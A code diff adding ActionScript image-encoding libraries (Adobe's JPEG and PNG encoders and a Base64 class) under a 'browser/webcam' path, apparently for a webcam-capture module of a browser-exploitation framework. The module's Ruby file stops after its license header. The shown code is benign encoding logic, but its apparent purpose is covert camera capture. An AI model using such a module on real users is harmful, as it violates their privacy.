+  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+package com.adobe.images
+{
+	import flash.geom.*;
+	import flash.display.*;
+	import flash.utils.*;
+	
+	/**
+	 * Class that converts BitmapData into a valid JPEG
+	 */		
+	public class JPGEncoder
+	{
+
+		// Static table initialization
+	
+		private var ZigZag:Array = [
+			 0, 1, 5, 6,14,15,27,28,
+			 2, 4, 7,13,16,26,29,42,
+			 3, 8,12,17,25,30,41,43,
+			 9,11,18,24,31,40,44,53,
+			10,19,23,32,39,45,52,54,
+			20,22,33,38,46,51,55,60,
+			21,34,37,47,50,56,59,61,
+			35,36,48,49,57,58,62,63
+		];
+	
+		private var YTable:Array = new Array(64);
+		private var UVTable:Array = new Array(64);
+		private var fdtbl_Y:Array = new Array(64);
+		private var fdtbl_UV:Array = new Array(64);
+	
+		private function initQuantTables(sf:int):void
+		{
+			var i:int;
+			var t:Number;
+			var YQT:Array = [
+				16, 11, 10, 16, 24, 40, 51, 61,
+				12, 12, 14, 19, 26, 58, 60, 55,
+				14, 13, 16, 24, 40, 57, 69, 56,
+				14, 17, 22, 29, 51, 87, 80, 62,
+				18, 22, 37, 56, 68,109,103, 77,
+				24, 35, 55, 64, 81,104,113, 92,
+				49, 64, 78, 87,103,121,120,101,
+				72, 92, 95, 98,112,100,103, 99
+			];
+			for (i = 0; i < 64; i++) {
+				t = Math.floor((YQT[i]*sf+50)/100);
+				if (t < 1) {
+					t = 1;
+				} else if (t > 255) {
+					t = 255;
+				}
+				YTable[ZigZag[i]] = t;
+			}
+			var UVQT:Array = [
+				17, 18, 24, 47, 99, 99, 99, 99,
+				18, 21, 26, 66, 99, 99, 99, 99,
+				24, 26, 56, 99, 99, 99, 99, 99,
+				47, 66, 99, 99, 99, 99, 99, 99,
+				99, 99, 99, 99, 99, 99, 99, 99,
+				99, 99, 99, 99, 99, 99, 99, 99,
+				99, 99, 99, 99, 99, 99, 99, 99,
+				99, 99, 99, 99, 99, 99, 99, 99
+			];
+			for (i = 0; i < 64; i++) {
+				t = Math.floor((UVQT[i]*sf+50)/100);
+				if (t < 1) {
+					t = 1;
+				} else if (t > 255) {
+					t = 255;
+				}
+				UVTable[ZigZag[i]] = t;
+			}
+			var aasf:Array = [
+				1.0, 1.387039845, 1.306562965, 1.175875602,
+				1.0, 0.785694958, 0.541196100, 0.275899379
+			];
+			i = 0;
+			for (var row:int = 0; row < 8; row++)
+			{
+				for (var col:int = 0; col < 8; col++)
+				{
+					fdtbl_Y[i]  = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
+					fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
+					i++;
+				}
+			}
+		}
+	
+		private var YDC_HT:Array;
+		private var UVDC_HT:Array;
+		private var YAC_HT:Array;
+		private var UVAC_HT:Array;
+	
+		private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array
+		{
+			var codevalue:int = 0;
+			var pos_in_table:int = 0;
+			var HT:Array = new Array();
+			for (var k:int=1; k<=16; k++) {
+				for (var j:int=1; j<=nrcodes[k]; j++) {
+					HT[std_table[pos_in_table]] = new BitString();
+					HT[std_table[pos_in_table]].val = codevalue;
+					HT[std_table[pos_in_table]].len = k;
+					pos_in_table++;
+					codevalue++;
+				}
+				codevalue*=2;
+			}
+			return HT;
+		}
+	
+		private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0];
+		private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
+		private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d];
+		private var std_ac_luminance_values:Array = [
+			0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,
+			0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,
+			0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,
+			0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0,
+			0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,
+			0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,
+			0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,
+			0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49,
+			0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,
+			0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,
+			0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,
+			0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89,
+			0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,
+			0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,
+			0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,
+			0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5,
+			0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,
+			0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,
+			0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,
+			0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
+			0xf9,0xfa
+		];
+	
+		private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0];
+		private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
+		private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77];
+		private var std_ac_chrominance_values:Array = [
+			0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,
+			0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,
+			0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,
+			0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0,
+			0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,
+			0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,
+			0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,
+			0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,
+			0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,
+			0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,
+			0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,
+			0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87,
+			0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,
+			0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,
+			0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,
+			0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,
+			0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,
+			0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,
+			0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,
+			0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
+			0xf9,0xfa
+		];
+	
+		private function initHuffmanTbl():void
+		{
+			YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values);
+			UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values);
+			YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values);
+			UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values);
+		}
+	
+		private var bitcode:Array = new Array(65535);
+		private var category:Array = new Array(65535);
+	
+		private function initCategoryNumber():void
+		{
+			var nrlower:int = 1;
+			var nrupper:int = 2;
+			var nr:int;
+			for (var cat:int=1; cat<=15; cat++) {
+				//Positive numbers
+				for (nr=nrlower; nr<nrupper; nr++) {
+					category[32767+nr] = cat;
+					bitcode[32767+nr] = new BitString();
+					bitcode[32767+nr].len = cat;
+					bitcode[32767+nr].val = nr;
+				}
+				//Negative numbers
+				for (nr=-(nrupper-1); nr<=-nrlower; nr++) {
+					category[32767+nr] = cat;
+					bitcode[32767+nr] = new BitString();
+					bitcode[32767+nr].len = cat;
+					bitcode[32767+nr].val = nrupper-1+nr;
+				}
+				nrlower <<= 1;
+				nrupper <<= 1;
+			}
+		}
+	
+		// IO functions
+	
+		private var byteout:ByteArray;
+		private var bytenew:int = 0;
+		private var bytepos:int = 7;
+	
+		private function writeBits(bs:BitString):void
+		{
+			var value:int = bs.val;
+			var posval:int = bs.len-1;
+			while ( posval >= 0 ) {
+				if (value & uint(1 << posval) ) {
+					bytenew |= uint(1 << bytepos);
+				}
+				posval--;
+				bytepos--;
+				if (bytepos < 0) {
+					if (bytenew == 0xFF) {
+						writeByte(0xFF);
+						writeByte(0);
+					}
+					else {
+						writeByte(bytenew);
+					}
+					bytepos=7;
+					bytenew=0;
+				}
+			}
+		}
+	
+		private function writeByte(value:int):void
+		{
+			byteout.writeByte(value);
+		}
+	
+		private function writeWord(value:int):void
+		{
+			writeByte((value>>8)&0xFF);
+			writeByte((value   )&0xFF);
+		}
+	
+		// DCT & quantization core
+	
+		private function fDCTQuant(data:Array, fdtbl:Array):Array
+		{
+			var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number;
+			var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number;
+			var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number;
+			var i:int;
+			/* Pass 1: process rows. */
+			var dataOff:int=0;
+			for (i=0; i<8; i++) {
+				tmp0 = data[dataOff+0] + data[dataOff+7];
+				tmp7 = data[dataOff+0] - data[dataOff+7];
+				tmp1 = data[dataOff+1] + data[dataOff+6];
+				tmp6 = data[dataOff+1] - data[dataOff+6];
+				tmp2 = data[dataOff+2] + data[dataOff+5];
+				tmp5 = data[dataOff+2] - data[dataOff+5];
+				tmp3 = data[dataOff+3] + data[dataOff+4];
+				tmp4 = data[dataOff+3] - data[dataOff+4];
+	
+				/* Even part */
+				tmp10 = tmp0 + tmp3;	/* phase 2 */
+				tmp13 = tmp0 - tmp3;
+				tmp11 = tmp1 + tmp2;
+				tmp12 = tmp1 - tmp2;
+	
+				data[dataOff+0] = tmp10 + tmp11; /* phase 3 */
+				data[dataOff+4] = tmp10 - tmp11;
+	
+				z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
+				data[dataOff+2] = tmp13 + z1; /* phase 5 */
+				data[dataOff+6] = tmp13 - z1;
+	
+				/* Odd part */
+				tmp10 = tmp4 + tmp5; /* phase 2 */
+				tmp11 = tmp5 + tmp6;
+				tmp12 = tmp6 + tmp7;
+	
+				/* The rotator is modified from fig 4-8 to avoid extra negations. */
+				z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
+				z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
+				z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
+				z3 = tmp11 * 0.707106781; /* c4 */
+	
+				z11 = tmp7 + z3;	/* phase 5 */
+				z13 = tmp7 - z3;
+	
+				data[dataOff+5] = z13 + z2;	/* phase 6 */
+				data[dataOff+3] = z13 - z2;
+				data[dataOff+1] = z11 + z4;
+				data[dataOff+7] = z11 - z4;
+	
+				dataOff += 8; /* advance pointer to next row */
+			}
+	
+			/* Pass 2: process columns. */
+			dataOff = 0;
+			for (i=0; i<8; i++) {
+				tmp0 = data[dataOff+ 0] + data[dataOff+56];
+				tmp7 = data[dataOff+ 0] - data[dataOff+56];
+				tmp1 = data[dataOff+ 8] + data[dataOff+48];
+				tmp6 = data[dataOff+ 8] - data[dataOff+48];
+				tmp2 = data[dataOff+16] + data[dataOff+40];
+				tmp5 = data[dataOff+16] - data[dataOff+40];
+				tmp3 = data[dataOff+24] + data[dataOff+32];
+				tmp4 = data[dataOff+24] - data[dataOff+32];
+	
+				/* Even part */
+				tmp10 = tmp0 + tmp3;	/* phase 2 */
+				tmp13 = tmp0 - tmp3;
+				tmp11 = tmp1 + tmp2;
+				tmp12 = tmp1 - tmp2;
+	
+				data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */
+				data[dataOff+32] = tmp10 - tmp11;
+	
+				z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
+				data[dataOff+16] = tmp13 + z1; /* phase 5 */
+				data[dataOff+48] = tmp13 - z1;
+	
+				/* Odd part */
+				tmp10 = tmp4 + tmp5; /* phase 2 */
+				tmp11 = tmp5 + tmp6;
+				tmp12 = tmp6 + tmp7;
+	
+				/* The rotator is modified from fig 4-8 to avoid extra negations. */
+				z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
+				z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
+				z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
+				z3 = tmp11 * 0.707106781; /* c4 */
+	
+				z11 = tmp7 + z3;	/* phase 5 */
+				z13 = tmp7 - z3;
+	
+				data[dataOff+40] = z13 + z2; /* phase 6 */
+				data[dataOff+24] = z13 - z2;
+				data[dataOff+ 8] = z11 + z4;
+				data[dataOff+56] = z11 - z4;
+	
+				dataOff++; /* advance pointer to next column */
+			}
+	
+			// Quantize/descale the coefficients
+			for (i=0; i<64; i++) {
+				// Apply the quantization and scaling factor & Round to nearest integer
+				data[i] = Math.round((data[i]*fdtbl[i]));
+			}
+			return data;
+		}
+	
+		// Chunk writing
+	
+		private function writeAPP0():void
+		{
+			writeWord(0xFFE0); // marker
+			writeWord(16); // length
+			writeByte(0x4A); // J
+			writeByte(0x46); // F
+			writeByte(0x49); // I
+			writeByte(0x46); // F
+			writeByte(0); // = "JFIF",'\0'
+			writeByte(1); // versionhi
+			writeByte(1); // versionlo
+			writeByte(0); // xyunits
+			writeWord(1); // xdensity
+			writeWord(1); // ydensity
+			writeByte(0); // thumbnwidth
+			writeByte(0); // thumbnheight
+		}
+	
+		private function writeSOF0(width:int, height:int):void
+		{
+			writeWord(0xFFC0); // marker
+			writeWord(17);   // length, truecolor YUV JPG
+			writeByte(8);    // precision
+			writeWord(height);
+			writeWord(width);
+			writeByte(3);    // nrofcomponents
+			writeByte(1);    // IdY
+			writeByte(0x11); // HVY
+			writeByte(0);    // QTY
+			writeByte(2);    // IdU
+			writeByte(0x11); // HVU
+			writeByte(1);    // QTU
+			writeByte(3);    // IdV
+			writeByte(0x11); // HVV
+			writeByte(1);    // QTV
+		}
+	
+		private function writeDQT():void
+		{
+			writeWord(0xFFDB); // marker
+			writeWord(132);	   // length
+			writeByte(0);
+			var i:int;
+			for (i=0; i<64; i++) {
+				writeByte(YTable[i]);
+			}
+			writeByte(1);
+			for (i=0; i<64; i++) {
+				writeByte(UVTable[i]);
+			}
+		}
+	
+		private function writeDHT():void
+		{
+			writeWord(0xFFC4); // marker
+			writeWord(0x01A2); // length
+			var i:int;
+	
+			writeByte(0); // HTYDCinfo
+			for (i=0; i<16; i++) {
+				writeByte(std_dc_luminance_nrcodes[i+1]);
+			}
+			for (i=0; i<=11; i++) {
+				writeByte(std_dc_luminance_values[i]);
+			}
+	
+			writeByte(0x10); // HTYACinfo
+			for (i=0; i<16; i++) {
+				writeByte(std_ac_luminance_nrcodes[i+1]);
+			}
+			for (i=0; i<=161; i++) {
+				writeByte(std_ac_luminance_values[i]);
+			}
+	
+			writeByte(1); // HTUDCinfo
+			for (i=0; i<16; i++) {
+				writeByte(std_dc_chrominance_nrcodes[i+1]);
+			}
+			for (i=0; i<=11; i++) {
+				writeByte(std_dc_chrominance_values[i]);
+			}
+	
+			writeByte(0x11); // HTUACinfo
+			for (i=0; i<16; i++) {
+				writeByte(std_ac_chrominance_nrcodes[i+1]);
+			}
+			for (i=0; i<=161; i++) {
+				writeByte(std_ac_chrominance_values[i]);
+			}
+		}
+	
+		private function writeSOS():void
+		{
+			writeWord(0xFFDA); // marker
+			writeWord(12); // length
+			writeByte(3); // nrofcomponents
+			writeByte(1); // IdY
+			writeByte(0); // HTY
+			writeByte(2); // IdU
+			writeByte(0x11); // HTU
+			writeByte(3); // IdV
+			writeByte(0x11); // HTV
+			writeByte(0); // Ss
+			writeByte(0x3f); // Se
+			writeByte(0); // Bf
+		}
+	
+		// Core processing
+		private var DU:Array = new Array(64);
+	
+		private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number
+		{
+			var EOB:BitString = HTAC[0x00];
+			var M16zeroes:BitString = HTAC[0xF0];
+			var i:int;
+	
+			var DU_DCT:Array = fDCTQuant(CDU, fdtbl);
+			//ZigZag reorder
+			for (i=0;i<64;i++) {
+				DU[ZigZag[i]]=DU_DCT[i];
+			}
+			var Diff:int = DU[0] - DC; DC = DU[0];
+			//Encode DC
+			if (Diff==0) {
+				writeBits(HTDC[0]); // Diff might be 0
+			} else {
+				writeBits(HTDC[category[32767+Diff]]);
+				writeBits(bitcode[32767+Diff]);
+			}
+			//Encode ACs
+			var end0pos:int = 63;
+			for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) {
+			};
+			//end0pos = first element in reverse order !=0
+			if ( end0pos == 0) {
+				writeBits(EOB);
+				return DC;
+			}
+			i = 1;
+			while ( i <= end0pos ) {
+				var startpos:int = i;
+				for (; (DU[i]==0) && (i<=end0pos); i++) {
+				}
+				var nrzeroes:int = i-startpos;
+				if ( nrzeroes >= 16 ) {
+					for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) {
+						writeBits(M16zeroes);
+					}
+					nrzeroes = int(nrzeroes&0xF);
+				}
+				writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]);
+				writeBits(bitcode[32767+DU[i]]);
+				i++;
+			}
+			if ( end0pos != 63 ) {
+				writeBits(EOB);
+			}
+			return DC;
+		}
+	
+		private var YDU:Array = new Array(64);
+		private var UDU:Array = new Array(64);
+		private var VDU:Array = new Array(64);
+	
+		private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void
+		{
+			var pos:int=0;
+			for (var y:int=0; y<8; y++) {
+				for (var x:int=0; x<8; x++) {
+					var P:uint = img.getPixel32(xpos+x,ypos+y);
+					var R:Number = Number((P>>16)&0xFF);
+					var G:Number = Number((P>> 8)&0xFF);
+					var B:Number = Number((P    )&0xFF);
+					YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128;
+					UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B));
+					VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B));
+					pos++;
+				}
+			}
+		}
+	
+		/**
+		 * Constructor for JPEGEncoder class
+		 *
+		 * @param quality The quality level between 1 and 100 that detrmines the
+		 * level of compression used in the generated JPEG
+		 * @langversion ActionScript 3.0
+		 * @playerversion Flash 9.0
+		 * @tiptext
+		 */		
+		public function JPGEncoder(quality:Number = 50)
+		{
+			if (quality <= 0) {
+				quality = 1;
+			}
+			if (quality > 100) {
+				quality = 100;
+			}
+			var sf:int = 0;
+			if (quality < 50) {
+				sf = int(5000 / quality);
+			} else {
+				sf = int(200 - quality*2);
+			}
+			// Create tables
+			initHuffmanTbl();
+			initCategoryNumber();
+			initQuantTables(sf);
+		}
+	
+		/**
+		 * Created a JPEG image from the specified BitmapData
+		 *
+		 * @param image The BitmapData that will be converted into the JPEG format.
+		 * @return a ByteArray representing the JPEG encoded image data.
+		 * @langversion ActionScript 3.0
+		 * @playerversion Flash 9.0
+		 * @tiptext
+		 */	
+		public function encode(image:BitmapData):ByteArray
+		{
+			// Initialize bit writer
+			byteout = new ByteArray();
+			bytenew=0;
+			bytepos=7;
+	
+			// Add JPEG headers
+			writeWord(0xFFD8); // SOI
+			writeAPP0();
+			writeDQT();
+			writeSOF0(image.width,image.height);
+			writeDHT();
+			writeSOS();
+
+	
+			// Encode 8x8 macroblocks
+			var DCY:Number=0;
+			var DCU:Number=0;
+			var DCV:Number=0;
+			bytenew=0;
+			bytepos=7;
+			for (var ypos:int=0; ypos<image.height; ypos+=8) {
+				for (var xpos:int=0; xpos<image.width; xpos+=8) {
+					RGB2YUV(image, xpos, ypos);
+					DCY = processDU(YDU, fdtbl_Y, DCY, YDC_HT, YAC_HT);
+					DCU = processDU(UDU, fdtbl_UV, DCU, UVDC_HT, UVAC_HT);
+					DCV = processDU(VDU, fdtbl_UV, DCV, UVDC_HT, UVAC_HT);
+				}
+			}
+	
+			// Do the bit alignment of the EOI marker
+			if ( bytepos >= 0 ) {
+				var fillbits:BitString = new BitString();
+				fillbits.len = bytepos+1;
+				fillbits.val = (1<<(bytepos+1))-1;
+				writeBits(fillbits);
+			}
+	
+			writeWord(0xFFD9); //EOI
+			return byteout;
+		}
+	}
+}

modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as

@@ -0,0 +1,141 @@
+/*
+  Copyright (c) 2008, Adobe Systems Incorporated
+  All rights reserved.
+
+  Redistribution and use in source and binary forms, with or without 
+  modification, are permitted provided that the following conditions are
+  met:
+
+  * Redistributions of source code must retain the above copyright notice, 
+    this list of conditions and the following disclaimer.
+  
+  * Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in the 
+    documentation and/or other materials provided with the distribution.
+  
+  * Neither the name of Adobe Systems Incorporated nor the names of its 
+    contributors may be used to endorse or promote products derived from 
+    this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+  IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+package com.adobe.images
+{
+	import flash.geom.*;
+	import flash.display.Bitmap;
+	import flash.display.BitmapData;
+	import flash.utils.ByteArray;
+
+	/**
+	 * Class that converts BitmapData into a valid PNG
+	 */	
+	public class PNGEncoder
+	{
+		/**
+		 * Created a PNG image from the specified BitmapData
+		 *
+		 * @param image The BitmapData that will be converted into the PNG format.
+		 * @return a ByteArray representing the PNG encoded image data.
+		 * @langversion ActionScript 3.0
+		 * @playerversion Flash 9.0
+		 * @tiptext
+		 */			
+	    public static function encode(img:BitmapData):ByteArray {
+	        // Create output byte array
+	        var png:ByteArray = new ByteArray();
+	        // Write PNG signature
+	        png.writeUnsignedInt(0x89504e47);
+	        png.writeUnsignedInt(0x0D0A1A0A);
+	        // Build IHDR chunk
+	        var IHDR:ByteArray = new ByteArray();
+	        IHDR.writeInt(img.width);
+	        IHDR.writeInt(img.height);
+	        IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA
+	        IHDR.writeByte(0);
+	        writeChunk(png,0x49484452,IHDR);
+	        // Build IDAT chunk
+	        var IDAT:ByteArray= new ByteArray();
+	        for(var i:int=0;i < img.height;i++) {
+	            // no filter
+	            IDAT.writeByte(0);
+	            var p:uint;
+	            var j:int;
+	            if ( !img.transparent ) {
+	                for(j=0;j < img.width;j++) {
+	                    p = img.getPixel(j,i);
+	                    IDAT.writeUnsignedInt(
+	                        uint(((p&0xFFFFFF) << 8)|0xFF));
+	                }
+	            } else {
+	                for(j=0;j < img.width;j++) {
+	                    p = img.getPixel32(j,i);
+	                    IDAT.writeUnsignedInt(
+	                        uint(((p&0xFFFFFF) << 8)|
+	                        (p>>>24)));
+	                }
+	            }
+	        }
+	        IDAT.compress();
+	        writeChunk(png,0x49444154,IDAT);
+	        // Build IEND chunk
+	        writeChunk(png,0x49454E44,null);
+	        // return PNG
+	        return png;
+	    }
+	
+	    private static var crcTable:Array;
+	    private static var crcTableComputed:Boolean = false;
+	
+	    private static function writeChunk(png:ByteArray, 
+	            type:uint, data:ByteArray):void {
+	        if (!crcTableComputed) {
+	            crcTableComputed = true;
+	            crcTable = [];
+	            var c:uint;
+	            for (var n:uint = 0; n < 256; n++) {
+	                c = n;
+	                for (var k:uint = 0; k < 8; k++) {
+	                    if (c & 1) {
+	                        c = uint(uint(0xedb88320) ^ 
+	                            uint(c >>> 1));
+	                    } else {
+	                        c = uint(c >>> 1);
+	                    }
+	                }
+	                crcTable[n] = c;
+	            }
+	        }
+	        var len:uint = 0;
+	        if (data != null) {
+	            len = data.length;
+	        }
+	        png.writeUnsignedInt(len);
+	        var p:uint = png.position;
+	        png.writeUnsignedInt(type);
+	        if ( data != null ) {
+	            png.writeBytes(data);
+	        }
+	        var e:uint = png.position;
+	        png.position = p;
+	        c = 0xffffffff;
+	        for (var i:int = 0; i < (e-p); i++) {
+	            c = uint(crcTable[
+	                (c ^ png.readUnsignedByte()) & 
+	                uint(0xff)] ^ uint(c >>> 8));
+	        }
+	        c = uint(c^uint(0xffffffff));
+	        png.position = e;
+	        png.writeUnsignedInt(c);
+	    }
+	}
+}

modules/browser/webcam/dev/com/foxarc/util/Base64.as

@@ -0,0 +1,106 @@
+package com.foxarc.util{  
+    import flash.utils.ByteArray;  
+    public class Base64 {  
+        private static  const encodeChars:Array =   
+        ['A','B','C','D','E','F','G','H',  
+        'I','J','K','L','M','N','O','P',  
+        'Q','R','S','T','U','V','W','X',  
+        'Y','Z','a','b','c','d','e','f',  
+        'g','h','i','j','k','l','m','n',  
+        'o','p','q','r','s','t','u','v',  
+        'w','x','y','z','0','1','2','3',  
+        '4','5','6','7','8','9','+','/'];  
+        private static  const decodeChars:Array =   
+        [-1, -1, -1, -1, -1, -1, -1, -1,  
+        -1, -1, -1, -1, -1, -1, -1, -1,  
+        -1, -1, -1, -1, -1, -1, -1, -1,  
+        -1, -1, -1, -1, -1, -1, -1, -1,  
+        -1, -1, -1, -1, -1, -1, -1, -1,  
+        -1, -1, -1, 62, -1, -1, -1, 63,  
+        52, 53, 54, 55, 56, 57, 58, 59,  
+        60, 61, -1, -1, -1, -1, -1, -1,  
+        -1,  0,  1,  2,  3,  4,  5,  6,  
+         7,  8,  9, 10, 11, 12, 13, 14,  
+        15, 16, 17, 18, 19, 20, 21, 22,  
+        23, 24, 25, -1, -1, -1, -1, -1,  
+        -1, 26, 27, 28, 29, 30, 31, 32,  
+        33, 34, 35, 36, 37, 38, 39, 40,  
+        41, 42, 43, 44, 45, 46, 47, 48,  
+        49, 50, 51, -1, -1, -1, -1, -1];  
+        public static function encode(data:ByteArray):String {  
+            var out:Array = [];  
+            var i:int = 0;  
+            var j:int = 0;  
+            var r:int = data.length % 3;  
+            var len:int = data.length - r;  
+            var c:int;  
+            while (i < len) {  
+                c = data[i++] << 16 | data[i++] << 8 | data[i++];  
+                out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f];  
+            }  
+            if (r == 1) {  
+                c = data[i++];  
+                out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "==";  
+            }  
+            else if (r == 2) {  
+                c = data[i++] << 8 | data[i++];  
+                out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "=";  
+            }  
+            return out.join('');  
+        }  
+        public static function decode(str:String):ByteArray {  
+            var c1:int;  
+            var c2:int;  
+            var c3:int;  
+            var c4:int;  
+            var i:int;  
+            var len:int;  
+            var out:ByteArray;  
+            len = str.length;  
+            i = 0;  
+            out = new ByteArray();  
+            while (i < len) {  
+                // c1  
+                do {  
+                    c1 = decodeChars[str.charCodeAt(i++) & 0xff];  
+                } while (i < len && c1 == -1);  
+                if (c1 == -1) {  
+                    break;  
+                }  
+                // c2      
+                do {  
+                    c2 = decodeChars[str.charCodeAt(i++) & 0xff];  
+                } while (i < len && c2 == -1);  
+                if (c2 == -1) {  
+                    break;  
+                }  
+                out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4));  
+                // c3  
+                do {  
+                    c3 = str.charCodeAt(i++) & 0xff;  
+                    if (c3 == 61) {  
+                        return out;  
+                    }  
+                    c3 = decodeChars[c3];  
+                } while (i < len && c3 == -1);  
+                if (c3 == -1) {  
+                    break;  
+                }  
+                out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));  
+                // c4  
+                do {  
+                    c4 = str.charCodeAt(i++) & 0xff;  
+                    if (c4 == 61) {  
+                        return out;  
+                    }  
+                    c4 = decodeChars[c4];  
+                } while (i < len && c4 == -1);  
+                if (c4 == -1) {  
+                    break;  
+                }  
+                out.writeByte(((c3 & 0x03) << 6) | c4);  
+            }  
+            return out;  
+        }  
+    }  
+}

modules/browser/webcam/module.rb

@@ -0,0 +1,63 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
